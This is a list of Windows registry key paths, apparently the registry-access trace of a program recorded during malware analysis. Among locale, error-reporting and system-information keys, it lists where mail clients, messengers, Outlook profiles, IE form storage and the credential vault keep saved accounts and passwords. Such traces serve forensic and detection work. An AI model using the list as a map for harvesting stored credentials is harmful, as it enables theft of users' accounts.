HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\sMonDecimalSep
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\sMonThousandSep
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\sMonGrouping
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\sPositiveSign
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\sNegativeSign
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\sTimeFormat
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\sShortTime
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\s1159
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\s2359
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\sShortDate
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\sYearMonth
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\sLongDate
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\iCountry
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\iMeasure
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\iPaperSize
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\iDigits
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\iLZero
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\iNegNumber
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\NumShape
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\iCurrDigits
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\iCurrency
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\iNegCurr
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\iCalendarType
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\iFirstDayOfWeek
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\iFirstWeekOfYear
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Plus! ProductId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\CurrentType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\InstallDate
HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemPartition
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\PriorityControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\PriorityControl\Win32PrioritySeparation
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LicenseInfo\FilePrint
HKEY_CURRENT_USER\Software\Qualcomm\Eudora\CommandLine
HKEY_LOCAL_MACHINE\Software\Classes\Software\Qualcomm\Eudora\CommandLine\current
HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Thunderbird
HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
HKEY_CURRENT_USER\Software\Google\Google Desktop\Mailboxes
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts
HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
HKEY_CURRENT_USER\Identities
HKEY_CURRENT_USER\Identities\{141B4688-D8D4-4AD1-B583-99828374C040}
HKEY_CURRENT_USER\Identities\{141B4688-D8D4-4AD1-B583-99828374C040}\Username
HKEY_CURRENT_USER\Identities\{141B4688-D8D4-4AD1-B583-99828374C040}\Software\Microsoft\Internet Account Manager\Accounts
HKEY_CURRENT_USER\Identities\{141B4688-D8D4-4AD1-B583-99828374C040}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\00471e98b7a362469ed97e3915fd4111
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\10b0e4d6eb1de34dabd532a0806a0fec
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\192e64c97bf3a54488a039619c763627
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\32a3dc9c400a4b448b60ab7fe553a392
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\43e0bb79f0f2d84db98ff4f730d23d24
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\6a50d9bd87f9a8478751861a1591a6c2
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7760e21103136b47946c9c80fa097f15
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7d19c9e894f20d4780a31c9a9f17da11
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\818ecc2f310b344f807e8af5dc013189
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\POP3 User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\IMAP User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\HTTP User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\SMTP User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\POP3 User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\IMAP User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\HTTP User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\SMTP User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\POP3 User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\IMAP User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\HTTP User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\SMTP User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\POP3 User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\IMAP User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\HTTP User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\SMTP User
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles
HKEY_CURRENT_USER\Software\IncrediMail\Identities
HKEY_LOCAL_MACHINE\Software\IncrediMail\Identities
HKEY_LOCAL_MACHINE\Software\Group Mail
HKEY_CURRENT_USER\Software\Microsoft\MSNMessenger
HKEY_CURRENT_USER\Software\Microsoft\MessengerService
HKEY_CURRENT_USER\Software\Yahoo\Pager
HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL
HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\Debug
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\MachineID
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\Consent
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\Consent\DefaultConsent
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Windows Error Reporting
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\DontSendAdditionalData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\Disabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\Consent
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\Consent\DefaultConsent
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\Consent\DefaultOverrideBehavior
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\Consent\CLR20r3
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LoggingDisabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\DontShowUI
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\DisableArchive
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\ConfigureArchive
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\DisableQueue
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\MaxQueueCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\MaxArchiveCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\ForceQueue
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\QueuePesterInterval
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\ExcludedApplications
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\DebugApplications
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\SendEFSFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\BypassDataThrottling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\ForceUserModeCabCollection
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Windows Error Reporting
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\DontSendAdditionalData
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\Disabled
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\Consent\DefaultOverrideBehavior
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\Consent\CLR20r3
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\LoggingDisabled
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\DontShowUI
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\DisableArchive
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\ConfigureArchive
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\DisableQueue
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\MaxQueueCount
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\MaxArchiveCount
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\ForceQueue
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\QueuePesterInterval
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\ExcludedApplications
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\DebugApplications
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\SendEFSFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\BypassDataThrottling
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\ForceUserModeCabCollection
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\CorporateWerServer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\CorporateWerUseSSL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\CorporateWerPortNumber
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\CorporateWerUseAuthentication
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Reliability Analysis\RAC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Reliability Analysis\RAC\RacWerSampleTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\RestartRunTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\RestartRunTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\Throttling\CLR20r3
HKEY_LOCAL_MACHINE\Software\Microsoft\DirectUI
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SESSION MANAGER\SafeProcessSearchMode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\DataStore_V1.0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\DataStore_V1.0\Disable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\DataStore_V1.0\DataFilePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane3
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane4
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane6
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane8
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane9
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane10
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane11
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane12
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane13
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane14
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane15
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane16
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Segoe UI
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\ScrollInset
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\DragDelay
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\DragMinDist
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\ScrollDelay
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\ScrollInterval
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\Compatibility\dw20.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{0000897b-83df-4b96-be07-0fb58b01c4a4}\LanguageProfile\0x00000000\{0001bea3-ed56-483d-a2e2-aeae25577436}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{0000897b-83df-4b96-be07-0fb58b01c4a4}\LanguageProfile\0x00000000\{0001bea3-ed56-483d-a2e2-aeae25577436}\Enable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{0000897b-83df-4b96-be07-0fb58b01c4a4}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{03B5835F-F03C-411B-9CE2-AA23E1171E36}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{07EB03D6-B001-41DF-9192-BF9B841EE71F}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{3697C5FA-60DD-4B56-92D4-74A569205C16}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{531FDEBF-9B4C-4A43-A2AA-960E8FCDC732}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{70FAF614-E0B1-11D3-8F5C-00C04F9CF4AC}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{78CB5B0E-26ED-4FCC-854C-77E8F3D1AA80}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{81D4E9C9-1D3B-41BC-9E6C-4B40BF79E35E}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{8613E14C-D0C0-4161-AC0F-1DD2563286BC}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{A028AE76-01B1-46C2-99C4-ACD9858AE02F}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{AE6BE008-07FB-400D-8BEB-337A64F7051F}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{C1EE01F2-B3B6-4A6A-9DDD-E988C088EC82}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{DCBD6FA8-032F-11D3-B5B1-00C04FC324A1}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{E429B25A-E5D3-4D1F-9BE3-0C608477E3A1}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{F25E9F57-2FC8-4EB3-A41A-CCE5F08541E6}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{F89E9E58-BD2F-4008-9AC2-0F816C09F4EE}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_CURRENT_USER\Keyboard Layout\Toggle
HKEY_CURRENT_USER\Keyboard Layout\Toggle\Language Hotkey
HKEY_CURRENT_USER\Keyboard Layout\Toggle\Hotkey
HKEY_CURRENT_USER\Keyboard Layout\Toggle\Layout Hotkey
HKEY_CURRENT_USER\Software\Microsoft\CTF\DirectSwitchHotkeys
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\CTF\EnableAnchorContext
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\KnownClasses
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\TurnOffSPIAnimations
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\FontSubstitutes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\Segoe UI
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\EditionID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\BuildLabEx
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\CSDBuildNumber
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SystemInformation
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\BIOSVersion
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Windows
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Windows\CSDBuildNumber
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\CEIPRole\RolesInWER
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\LastWatsonCabUploaded
HKEY_LOCAL_MACHINE\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\WinHttpSettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\44D72C57
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\WOW64
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir
HKEY_USERS\S-1-5-18
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18
